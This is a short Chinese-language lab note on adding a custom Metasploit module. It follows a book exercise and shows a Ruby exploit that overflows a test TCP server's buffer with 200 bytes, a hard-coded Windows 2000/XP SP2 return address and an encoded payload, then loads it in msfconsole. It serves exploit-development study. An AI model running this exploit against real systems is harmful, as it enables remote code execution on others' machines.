首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如fwdtest
cp example.rb ./fwdtest/0day1.rb
根据0day安全书中例子修改0day1.rb脚本
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
def initialize(info = {})
super(
update_info(
info,
'Name' => 'failwest_test',
'Description' => %q(
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
),
'License' => MSF_LICENSE,
'Author' => ['skape'],
'References' =>
[
[ 'OSVDB', '12345' ],
[ 'EDB', '12345' ],
[ 'URL', 'http://www.example.com'],
[ 'CVE', '1978-1234']
],
'Payload' =>
{
'Space' => 200,
'BadChars' => "\x00"
},
'Targets' =>
[
[
'Windows 2000',
{
'Platform' => 'win',
'Ret' => 0x77F8511a
}
],
[
'Windows XP SP2',
{
'Platform' => 'win',
'Ret' => 0x7C914393
}
]
],
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0
)
)
end
def check
Exploit::CheckCode::Vulnerable
end
def exploit
connect
attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
sock.put(attack_buf)
handler
disconnect
end
end
在控制台下启动metasploit
在msf提示符下输入reload_all重新加载所有模块
在msf提示符下输入use exploit/fwdtest/0day1 输入的时候可以用tab补全,如果不能补全说明就有问题